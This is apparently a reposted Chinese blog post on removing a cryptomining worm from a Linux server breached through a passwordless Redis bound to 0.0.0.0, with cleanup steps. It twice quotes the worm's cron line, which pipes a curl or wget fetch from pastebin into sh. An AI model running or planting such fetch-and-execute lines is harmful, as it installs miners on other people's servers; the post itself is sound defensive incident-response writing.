中毒原因，redis bind 0.0.0.0 而且沒有密碼，和安全意識太薄弱。

所以，redis一定要設密碼，改端口，不要用root用戶啟動，如果業務沒有需要，不要bind 0.0.0.0！！！！！！！！！！！

這個病毒能都橫向傳播，不要以為在外網redis的端口不通就沒有事情。只要內網里有機器感染了病毒，就可以繼續感染。

病癥：CPU被不明進程吃滿。

該病毒主要是通過，crontab定時任務，向指定網站下載腳本，運行進行挖礦。

通過crontab -l 就能查看

*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh
通過crontab -r 和crontab -e 是刪除不掉的，因為本地有進程維護著這個定時任務。
而且，這個病毒還劫持了一些linux系統的命令，比如ps。
處理過程：
1.利用linux的iptables，對上方ip網段的進出口都封殺。這樣能夠治標，將CPU降下來。修改redis密碼。
2.檢查用戶下的.ssh文件夾，刪除不是自己的公鑰。中毒的時候，有可能被寫入了對方的公鑰，使得別人不需要密碼，直接登錄ssh登錄
3.利用默安科技的清理工具，進行清理。github地址：https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
4.清理之后，linux的ps命令應該是正常了，通過ps -ef 找出kerberods的相關的進程樹進行殺掉，注意，病毒可能變種，還需要具體問題具體分析。
5.病毒進程殺掉之后，應該可以修改crontab里的內容了。到這里了還不行，還需要檢查/var/spool/cron/ , /var/spool/cron/crontabs/ 和 /etc/cron.d/ 下的用戶文件，有可能也被寫入了定時任務，然后配合linux的 anacron就有可能替換cron，從而還原crontab定時任務。
上面大概就是這次清理這個病毒的大致過程，搞了兩天，終于將ps進程里的 （curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR）|sh 干掉了。現在還在繼續觀察著，，，，，，
血的教訓，服務器安全意識還是要有啊。redis能不bind 0.0.0.0 就不bind , 同時一定要設密碼，創建新的用戶來啟動redis,限制啟動redis的用戶登錄權限。

PS：如果確定了病毒是通過定時任務來執行的，可以對定時任務進行跟蹤，查看都執行了什么。
　　strace -o output.txt -T -f -ff -tt -e trace=all -p 定時任務PID

轉載于:https://www.cnblogs.com/undefined-j/p/10702019.html

總結

以上是生活随笔為你收集整理的记一次Linux服务器因redis漏洞的挖矿病毒入侵的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。